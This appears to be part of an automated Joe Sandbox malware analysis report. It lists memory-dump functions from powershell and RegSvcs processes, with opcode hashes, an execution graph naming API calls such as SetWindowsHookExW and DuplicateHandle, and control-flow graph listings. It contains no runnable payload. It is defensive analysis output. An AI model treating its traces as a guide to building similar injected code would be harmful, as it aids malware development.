                                              • Snapshot File: hcaresult_20_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ef4902246c3fe5d8e92a147ef196d9b0159ead743132710e439aea35ca8f54f
                                              • Instruction ID: 4b64c65fb2c7c09e925963f7d03cbea9f30746ef44329f9d76b6d8a080049717
                                              • Opcode Fuzzy Hash: 1ef4902246c3fe5d8e92a147ef196d9b0159ead743132710e439aea35ca8f54f
                                              • Instruction Fuzzy Hash: 5831F73160EBC94FDB59EB6884645787BE1EF66314B4405FED48ADB1D7CD2CA804C711
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD3496413E Relevance: .1, Instructions: 80COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.2628505203.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0a0cc9069b32548f22bc2e7b92d80acb6726a5c2f8284680be79e6382abe981
                                              • Instruction ID: 4baf650453ae1f36bf0cab62372b7092054b17a844079642bec746523aca8030
                                              • Opcode Fuzzy Hash: f0a0cc9069b32548f22bc2e7b92d80acb6726a5c2f8284680be79e6382abe981
                                              • Instruction Fuzzy Hash: D811E731B0DA094FEB98DA5C44A15B577D2EFA6231B4500BFD18EC3297DE1DA8025704
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD3489A2E0 Relevance: .1, Instructions: 77COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.2626989558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 493a5e48c1d76114097f5545c3acbc396a56df552202437c90d805548ad008eb
                                              • Instruction ID: a667ac17ae366b51dee4c17525badba58c1e67870b88a9672b7ab5459296a716
                                              • Opcode Fuzzy Hash: 493a5e48c1d76114097f5545c3acbc396a56df552202437c90d805548ad008eb
                                              • Instruction Fuzzy Hash: A2219030A18E494FE395EB2884A9775BFE1EF9A341F1405BAE44DC32A2DE2968859301
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34963746 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.2628505203.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 91499550472fe7a8b67a5e5f4777c069c30995bce721b818c6bd7ac82a256495
                                              • Instruction ID: c2646cce39d6469c4d6cbcbfe8386c5a4dde739af121d74c121cf0d8a03c1bc8
                                              • Opcode Fuzzy Hash: 91499550472fe7a8b67a5e5f4777c069c30995bce721b818c6bd7ac82a256495
                                              • Instruction Fuzzy Hash: 47119852F0DA4A0FF7B9965C24712B552C2DFDA235B5801BED64EC32DBDD1DAC025350
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34894849 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.2626989558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f7f8cb008fa1538042ac85c81320bd0618426aa01066b3fe299d05d57baff71e
                                              • Instruction ID: e1a681da6c24eb6a32413989b944f97c4e1dabb117500d3b2f46b445650975d4
                                              • Opcode Fuzzy Hash: f7f8cb008fa1538042ac85c81320bd0618426aa01066b3fe299d05d57baff71e
                                              • Instruction Fuzzy Hash: FE01847160CB454FDB98DA1CA49196577E0FB9A320F10066DF08AC3296DA36E842C741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348933B5 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.2626989558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0d5f8bd4930a63cdbcd6f9a23957c342ff1d62f78ef99ce6612c7dcee371064b
                                              • Instruction ID: ae605e7e7b896741c28386b595f310dc01aebb4b8afea9650844b96dbb4c98a5
                                              • Opcode Fuzzy Hash: 0d5f8bd4930a63cdbcd6f9a23957c342ff1d62f78ef99ce6612c7dcee371064b
                                              • Instruction Fuzzy Hash: A401A73020CB0C4FD744EF0CE451AA6B7E0FB89320F10052DE58AC3651DA36E882CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:10.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:59
                                              Total number of Limit Nodes:4
                                              execution_graph 49902 1407c80 49903 1407cc6 49902->49903 49907 1407e50 49903->49907 49912 1407e60 49903->49912 49904 1407db3 49909 1407e54 49907->49909 49908 1407e2a 49908->49904 49909->49908 49916 14079d4 49909->49916 49913 1407e61 49912->49913 49914 14079d4 DuplicateHandle 49913->49914 49915 1407e8e 49914->49915 49915->49904 49917 1407ec8 DuplicateHandle 49916->49917 49918 1407e8e 49917->49918 49918->49904 49919 14029c8 49920 1402a0c SetWindowsHookExW 49919->49920 49922 1402a52 49920->49922 49923 1402188 49924 1402197 49923->49924 49925 14021a2 49924->49925 49928 1406b68 49924->49928 49932 1406b78 49924->49932 49929 1406b87 49928->49929 49936 140633c 49929->49936 49933 1406b87 49932->49933 49934 140633c 2 API calls 49933->49934 49935 1406ba8 49934->49935 49935->49925 49937 1406347 49936->49937 49940 1407aa4 49937->49940 49939 140852e 49941 1407aaf 49940->49941 49942 1409054 49941->49942 49944 140a8e0 49941->49944 49942->49939 49945 140a901 49944->49945 49946 140a925 49945->49946 49948 140aa90 49945->49948 49946->49942 49951 140aa9d 49948->49951 49949 140aad6 49949->49946 49951->49949 49952 1408ccc 49951->49952 49953 1408cd7 49952->49953 49955 140ab48 49953->49955 49956 1408d00 49953->49956 49955->49955 49957 1408d0b 49956->49957 49960 1408d10 49957->49960 49959 140abb7 49959->49955 49961 1408d1b 49960->49961 49966 140b2c0 49961->49966 49963 140c138 49963->49959 49964 140a8e0 2 API calls 49964->49963 49965 140bf10 49965->49963 49965->49964 49967 140b2cb 49966->49967 49968 140d31a 49967->49968 49971 140d368 49967->49971 49975 140d378 49967->49975 49968->49965 49972 140d36c 49971->49972 49973 140d3f0 49972->49973 49974 140d3c6 KiUserCallbackDispatcher 49972->49974 49973->49968 49974->49973 49976 140d379 49975->49976 49977 140d3c6 KiUserCallbackDispatcher 49976->49977 49978 140d3f0 49976->49978 49977->49978 49978->49968

                                              Executed Functions

                                              Function 073C41E8 Relevance: 2.5, Instructions: 2478COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 73c41e8-73c420a 1 73c420c-73c4210 0->1 2 73c421a-73c4228 0->2 3 73c4212-73c4217 1->3 4 73c422a-73c4236 2->4 5 73c4264-73c426f 2->5 6 73c4239-73c4246 4->6 7 73c4248-73c4262 6->7 8 73c4272-73c4278 6->8 7->5 7->6 8->3 10 73c427a-73c429f 8->10 11 73c6c4d-73c6c76 10->11 12 73c42a5-73c42ad 10->12 13 73c6550-73c6553 12->13 14 73c42b3-73c4417 call 73c41e8 12->14 15 73c6559-73c668f call 73c41e8 13->15 16 73c6c43-73c6c4a 13->16 33 73c4419-73c4435 14->33 34 73c4453-73c4460 14->34 36 73c6a84-73c6c3b call 73c41e8 15->36 37 73c6695-73c6860 call 73c41e8 15->37 42 73c443d-73c4451 33->42 43 73c4468-73c4472 34->43 297 73c6c3d call 73c41e8 36->297 298 73c6c3d call 73c41d8 36->298 71 73c696f-73c6a72 call 73c41e8 37->71 72 73c6866-73c696a call 73c41e8 37->72 42->43 44 73c4478-73c4642 call 73c41e8 43->44 45 73c6546-73c654d 43->45 80 73c4644-73c4653 44->80 81 73c4656-73c4820 44->81 97 73c6a7a-73c6a7e 71->97 72->97 80->81 81->11 102 73c4826-73c4b6f 81->102 97->36 97->37 117 73c4b71-73c4b9a 102->117 117->11 120 73c4ba0-73c4bad 117->120 121 73c4baf 120->121 122 73c4bc0-73c4bd8 120->122 123 73c4c8b-73c4c96 121->123 124 73c4bb5-73c4bba 121->124 128 73c4bda-73c4c2f 122->128 129 73c4c34-73c4c89 122->129 123->11 125 73c4c9c-73c4ca3 123->125 124->122 124->123 125->11 127 73c4ca9-73c4cc8 125->127 130 73c4ccc-73c4cd0 127->130 128->130 129->130 130->117 132 73c4cd6-73c4d3c 130->132 136 73c4e78-73c4efe 132->136 137 73c4d42-73c4d4e 132->137 144 73c503a-73c50c0 136->144 145 73c4f04-73c4f10 136->145 137->11 138 73c4d54-73c4e48 137->138 138->11 151 73c4e4e-73c4e73 138->151 156 73c50c6-73c50d2 144->156 157 73c51f7-73c525d 144->157 145->11 147 73c4f16-73c500a 145->147 147->11 164 73c5010-73c5035 147->164 151->157 156->11 160 73c50d8-73c51cc 156->160 166 73c5410-73c5496 157->166 167 73c5263-73c526f 157->167 160->11 177 73c51d2-73c51ef 160->177 164->157 182 73c549c-73c54a8 166->182 183 73c5649-73c56cf 166->183 167->11 170 73c5275-73c5358 167->170 170->11 184 73c535e-73c53e0 170->184 177->157 182->11 185 73c54ae-73c5591 182->185 195 73c587d-73c589b 183->195 196 73c56d5-73c56e1 183->196 184->11 199 73c53e6-73c540b 184->199 185->11 200 73c5597-73c5619 185->200 195->11 198 73c58a1-73c595e 195->198 196->11 197 73c56e7-73c57ca 196->197 197->11 213 73c57d0-73c5852 197->213 198->11 209 73c5964-73c59d5 198->209 199->195 200->11 212 73c561f-73c5644 200->212 209->11 218 73c59db-73c5a4c 209->218 212->195 213->11 224 73c5858-73c5875 213->224 218->11 225 73c5a52-73c5ad5 218->225 224->195 225->11 230 73c5adb-73c5b57 call 73c41e8 225->230 235 73c5b5d-73c5b69 230->235 236 73c5e4a-73c5ed0 230->236 235->11 237 73c5b6f-73c5d92 235->237 244 73c5ed6-73c5ee2 236->244 245 73c61c3-73c6249 236->245 237->11 266 73c5d98-73c5e1a 237->266 244->11 246 73c5ee8-73c610b 244->246 256 73c624f-73c625b 245->256 257 73c6537-73c6540 245->257 246->11 278 73c6111-73c6193 246->278 256->11 259 73c6261-73c6484 256->259 257->44 257->45 259->11 289 73c648a-73c650c 259->289 266->11 277 73c5e20-73c5e45 266->277 277->257 278->11 288 73c6199-73c61be 278->288 288->257 289->11 295 73c6512-73c652f 289->295 295->257 297->16 298->16
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef0c08210532bf4efa82e6866de0bccca17b683a04794d3ba09233659a99c71c
                                              • Instruction ID: d5663728dcea7eb88f901e92237de5e29d504ce4c864008e42b26b8efd47be81
                                              • Opcode Fuzzy Hash: ef0c08210532bf4efa82e6866de0bccca17b683a04794d3ba09233659a99c71c
                                              • Instruction Fuzzy Hash: C243D531C10B5A8ADB11EF68C8945A9F7B1FF99300F11D79AE45877221EB70AAD4CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C7120 Relevance: 1.9, Instructions: 1913COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 299 73c7120-73c7143 300 73c7145 299->300 301 73c71b0-73c71b4 299->301 304 73c7148-73c714e 300->304 302 73c71b6-73c71bf 301->302 303 73c71c0-73c71c9 301->303 305 73c71cf-73c71df 303->305 306 73c7369-73c7397 303->306 304->306 307 73c7154-73c71a3 304->307 305->306 308 73c71e5-73c722c 305->308 311 73c739d-73c73a5 306->311 312 73c8eba-73c8eff call 73c901f 306->312 359 73c71aa-73c71ae 307->359 360 73c71a5-73c71a8 307->360 308->306 328 73c7232-73c7255 308->328 315 73c73ab-73c7510 call 73c41e8 311->315 316 73c8957-73c895a 311->316 324 73c8f05-73c8f45 312->324 371 73c754e-73c755c 315->371 372 73c7512-73c754c call 73c6f00 315->372 317 73c8eab-73c8eb7 316->317 318 73c8960-73c8a9f call 73c41e8 316->318 375 73c8cec-73c8ea3 call 73c41e8 318->375 376 73c8aa5-73c8ce6 call 73c41e8 * 2 318->376 331 73c8fde-73c9013 324->331 332 73c8f4b-73c8f60 324->332 339 73c732a-73c7333 328->339 340 73c725b-73c7260 328->340 353 73c8fcc-73c8fd8 331->353 354 73c9015-73c901d 331->354 357 73c8f81-73c8fc9 332->357 358 73c8f62-73c8f69 332->358 339->306 344 73c7335-73c7359 339->344 340->306 346 73c7266-73c72ab 340->346 364 73c7361-73c7368 344->364 380 73c72ad-73c72be 346->380 381 73c72c5-73c72df 346->381 353->331 353->332 357->353 358->357 363 73c8f6b-73c8f7d 358->363 359->301 359->304 360->301 363->357 390 73c7564-73c756d 371->390 372->390 375->317 376->375 380->381 381->339 393 73c72e1-73c7324 call 73c6f00 381->393 390->317 391 73c7573-73c7743 call 73c41e8 390->391 432 73c7745-73c7754 391->432 433 73c7757-73c7920 call 73c6c78 call 73c6ce8 call 73c6c78 391->433 393->339 393->340 432->433 433->312 448 73c7926-73c7d67 call 73c6ce8 call 73c6c78 call 73c6ce8 433->448 469 73c7d78-73c7dc2 call 73c6f00 call 73c6c78 448->469 470 73c7d69 448->470 469->312 486 73c7dc8-73c7df4 call 73c6ce8 469->486 471 73c7d6f-73c7d72 470->471 472 73c7f47-73c7f53 470->472 471->469 471->472 472->312 473 73c7f59-73c7f91 472->473 480 73c7f97-73c7fa2 473->480 481 73c8943-73c894c 473->481 480->312 484 73c7fa8-73c7fb5 480->484 481->391 485 73c8952 481->485 487 73c7fc7-73c7fe3 call 73c6ed8 484->487 488 73c7fb7 484->488 485->317 498 73c7df6 486->498 499 73c7e07-73c7e23 call 73c6ed8 486->499 496 73c7fe9-73c804f 487->496 497 73c8620-73c862c 487->497 490 73c7fbd-73c7fc1 488->490 491 73c87b1-73c87cf 488->491 490->487 490->491 491->312 495 73c87d5-73c891c call 73c41e8 491->495 545 73c8927-73c893d 495->545 517 73c8055-73c8061 496->517 518 73c81e6-73c826c 496->518 497->312 503 73c8632-73c87ac 497->503 500 73c7dfc-73c7e01 498->500 501 73c7ee8-73c7efd 498->501 510 73c7e88-73c7ee6 499->510 511 73c7e25-73c7e83 499->511 500->499 500->501 501->312 505 73c7f03-73c7f11 501->505 503->545 508 73c7f19-73c7f36 505->508 508->472 513 73c7f38 508->513 510->508 511->508 513->469 515 73c7f3e-73c7f41 513->515 515->469 515->472 517->312 522 73c8067-73c81e1 517->522 536 73c8272-73c827e 518->536 537 73c8403-73c8489 518->537 522->545 536->312 538 73c8284-73c83fe 536->538 537->545 553 73c848f-73c849b 537->553 538->545 545->480 545->481 553->312 555 73c84a1-73c861b 553->555 555->545
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bf675db6c33fcb7f2cce78b4c97c5d1b2bc1719650fe06d9ea1491728743e72
                                              • Instruction ID: 3db0253540e20cb08526ff373d1b1fab9dd4fe7badc02a2d159016ceb28f5081
                                              • Opcode Fuzzy Hash: 6bf675db6c33fcb7f2cce78b4c97c5d1b2bc1719650fe06d9ea1491728743e72
                                              • Instruction Fuzzy Hash: 3713E971D10B1A8ADB11EF68C854599F7B1FF99300F11D79AE4487B221EB70AAC5CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735ACF8 Relevance: 1.3, Instructions: 1269COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78009a35c3c3f73bad215ed61b0a64bb5f48a804219101714cbb604d4df91734
                                              • Instruction ID: 27bb87627d19e709c89684c05163d4c0382961baf092d5822f3574589bd41031
                                              • Opcode Fuzzy Hash: 78009a35c3c3f73bad215ed61b0a64bb5f48a804219101714cbb604d4df91734
                                              • Instruction Fuzzy Hash: 08C227B0A01219DFEB25DF64C885BADBBB2FF89301F1085A9E909A7351DB359D81CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073579A0 Relevance: 1.0, Instructions: 957COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dee81d47b0cc7ac2b943717bbd41142bd1cc7260e1649a3d00a9092dff137a7a
                                              • Instruction ID: babd20cd9fb8104ad8b1e0688d471561bdfa7ae4f53035636a5e5fa8bb1c3073
                                              • Opcode Fuzzy Hash: dee81d47b0cc7ac2b943717bbd41142bd1cc7260e1649a3d00a9092dff137a7a
                                              • Instruction Fuzzy Hash: 6D9229B4A00215CFDB28DF29C994A69BBF2FF88310F158599D94A9B361DB30ED81CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735130B Relevance: .8, Instructions: 787COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 509d5de290b533834473a57ca4e8ba7384b7941182a5db9a54c658eea29dc0e5
                                              • Instruction ID: 50ed8ad8bad2d1fcdfe49506069b27d70ccd98af291a7e540b5831a773419c19
                                              • Opcode Fuzzy Hash: 509d5de290b533834473a57ca4e8ba7384b7941182a5db9a54c658eea29dc0e5
                                              • Instruction Fuzzy Hash: 97621AF0600305DBE74D9F68D45871ABAE6EB84308F24C46C851D9F392DBBBD90B8B95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07351318 Relevance: .8, Instructions: 780COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d24f672a1c1003dfeb3a8d3bec59bf3038db575fb0ec410fa18563a583bb2dc
                                              • Instruction ID: 9479daee81fd8485c7d007612bd8e30994e3e61f95306370aa47bccfa721a2ab
                                              • Opcode Fuzzy Hash: 1d24f672a1c1003dfeb3a8d3bec59bf3038db575fb0ec410fa18563a583bb2dc
                                              • Instruction Fuzzy Hash: F66219F0600305DBE74D9F68D45871ABAE6EB84308F24C46C851D9F392CBBBD90B8B95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735F6F4 Relevance: .7, Instructions: 690COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e01cb722aa21a352deec61b7ccf3820220d8664ce306a8fd0b1a1c4deec8943
                                              • Instruction ID: 81bebe89111dfc1edf72f93f2e9d074c593f2787bc9d5a98b7d6cc170ad9eb54
                                              • Opcode Fuzzy Hash: 0e01cb722aa21a352deec61b7ccf3820220d8664ce306a8fd0b1a1c4deec8943
                                              • Instruction Fuzzy Hash: EE525DB4A0020ADFEB19DFA4D494A9DBBF2FF89310F158169E9099B365DB31EC41CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735E609 Relevance: .6, Instructions: 649COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1369d21bf329d61f9c1d562e8f575147c2e64624282168e236ee459cf7f1f4fb
                                              • Instruction ID: ff307cf0c7af0624aee57a9f8cfc7550a155c4532a38edf2afc03240067cd39b
                                              • Opcode Fuzzy Hash: 1369d21bf329d61f9c1d562e8f575147c2e64624282168e236ee459cf7f1f4fb
                                              • Instruction Fuzzy Hash: D542C0B1A00341DFEB29DF34C448A6ABBF6FF85315F144869D94ACB691CB78E981CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BE6B0 Relevance: .5, Instructions: 529COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad08edae97ac39b9d75b178683e2658d2feaa89f057d5f4929fc637fc7f5d852
                                              • Instruction ID: 24647501cc9bcf88c7c84c83c88880c79ed2f60bb8a73f1a518ce7e3d3dbfcde
                                              • Opcode Fuzzy Hash: ad08edae97ac39b9d75b178683e2658d2feaa89f057d5f4929fc637fc7f5d852
                                              • Instruction Fuzzy Hash: 22125CB4B102069FCB24DF68C8549AEBBF6BF89750F158169D906EB365DB30EC41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735C0C8 Relevance: .4, Instructions: 401COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f4ff77c72ad9d78752060e4655f746d93878c74fec7f4e79329b6002b9edf56
                                              • Instruction ID: dca6f86c48d92b631146a1dfe310b3df6ff8b13afb56f7e750e99a314e3268db
                                              • Opcode Fuzzy Hash: 0f4ff77c72ad9d78752060e4655f746d93878c74fec7f4e79329b6002b9edf56
                                              • Instruction Fuzzy Hash: B3F16FB4A00309DFEB09DFA4D854AADBBB2FF88304F148569D81AAB355DB35EC45CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BF018 Relevance: 1.8, Strings: 1, Instructions: 593COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 571 72bf018-72bf060 call 72bedb0 576 72bf062-72bf064 571->576 577 72bf066-72bf06a 571->577 578 72bf070-72bf093 576->578 577->578 583 72bf09f-72bf0ab 578->583 584 72bf095-72bf09a 578->584 589 72bf0de-72bf0ea 583->589 590 72bf0ad-72bf0d9 call 72be6b0 583->590 585 72bf17b-72bf181 584->585 587 72bf183 585->587 588 72bf187-72bf1a7 585->588 587->588 602 72bf1a9-72bf1ae 588->602 603 72bf1b3-72bf1c8 588->603 594 72bf0ec-72bf0f1 589->594 595 72bf0f6-72bf10a 589->595 590->585 594->585 607 72bf10c-72bf12e 595->607 608 72bf176 595->608 605 72bf250-72bf25e 602->605 615 72bf24b 603->615 616 72bf1ce-72bf1de 603->616 611 72bf260-72bf264 605->611 612 72bf276-72bf282 605->612 628 72bf130-72bf152 607->628 629 72bf154-72bf16d 607->629 608->585 743 72bf266 call 72bf920 611->743 744 72bf266 call 72bf860 611->744 745 72bf266 call 72bf850 611->745 620 72bf288-72bf2a4 612->620 621 72bf366-72bf39a 612->621 615->605 623 72bf1f2-72bf1f7 616->623 624 72bf1e0-72bf1f0 616->624 617 72bf26c-72bf26e 617->612 636 72bf352-72bf360 620->636 644 72bf39c-72bf3b0 621->644 645 72bf3b2-72bf3b4 621->645 623->605 624->623 635 72bf1f9-72bf209 624->635 628->608 628->629 629->608 646 72bf16f-72bf174 629->646 642 72bf20b-72bf210 635->642 643 72bf212-72bf222 635->643 636->621 641 72bf2a9-72bf2b2 636->641 647 72bf2b8-72bf2cb 641->647 648 72bf571-72bf598 641->648 642->605 658 72bf22b-72bf23b 643->658 659 72bf224-72bf229 643->659 644->645 650 72bf3b6-72bf3c8 645->650 651 72bf3e4-72bf424 645->651 646->585 647->648 652 72bf2d1-72bf2e3 647->652 660 72bf59e-72bf5a0 648->660 661 72bf62c-72bf67d 648->661 650->651 667 72bf3ca-72bf3dc 650->667 739 72bf426 call 72bfc59 651->739 740 72bf426 call 72bfc68 651->740 663 72bf34f 652->663 664 72bf2e5-72bf2f1 652->664 674 72bf23d-72bf242 658->674 675 72bf244-72bf249 658->675 659->605 660->661 666 72bf5a6-72bf5a8 660->666 700 72bf67f-72bf68c 661->700 701 72bf68d-72bf697 661->701 663->636 664->648 668 72bf2f7-72bf34c 664->668 666->661 671 72bf5ae-72bf5b2 666->671 667->651 668->663 671->661 676 72bf5b4-72bf5b8 671->676 674->605 675->605 680 72bf5ca-72bf60c call 72b9f38 676->680 681 72bf5ba-72bf5c8 676->681 679 72bf42c-72bf440 694 72bf442-72bf459 679->694 695 72bf487-72bf49e 679->695 688 72bf614-72bf629 680->688 681->688 708 72bf45b-72bf465 694->708 709 72bf467-72bf47f call 72be6b0 694->709 741 72bf4a0 call 7350833 695->741 742 72bf4a0 call 7350838 695->742 710 72bf699-72bf6a4 701->710 711 72bf6a6-72bf6ac 701->711 705 72bf4a6-72bf4d4 720 72bf528-72bf53f 705->720 721 72bf4d6-72bf4ef 705->721 708->709 709->695 718 72bf6ae-72bf6f4 710->718 711->718 726 72bf541-72bf54a 720->726 727 72bf565-72bf56e 720->727 729 72bf4f9-72bf525 721->729 730 72bf4f1 721->730 737 72bf54d call 7354fb8 726->737 738 72bf54d call 7354fa8 726->738 729->720 730->729 731 72bf553-72bf55c 731->727 737->731 738->731 739->679 740->679 741->705 742->705 743->617 744->617 745->617
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ;k
                                              • API String ID: 0-4239655375
                                              • Opcode ID: ad78efbaaac41d717bbb91f02cef90434b97e6ba721915defb706ee82d3adfa6
                                              • Instruction ID: 13b27cddd9d83a274bf3b20ceaa9c92c95806d590ea47e6fa8c15a7d3db8e6d5
                                              • Opcode Fuzzy Hash: ad78efbaaac41d717bbb91f02cef90434b97e6ba721915defb706ee82d3adfa6
                                              • Instruction Fuzzy Hash: 1E3249B4710606CFDB14DF29C994AAABBF2FF89340B1584A9E506CB362DB74EC45CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C2C40 Relevance: 1.7, Strings: 1, Instructions: 429COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
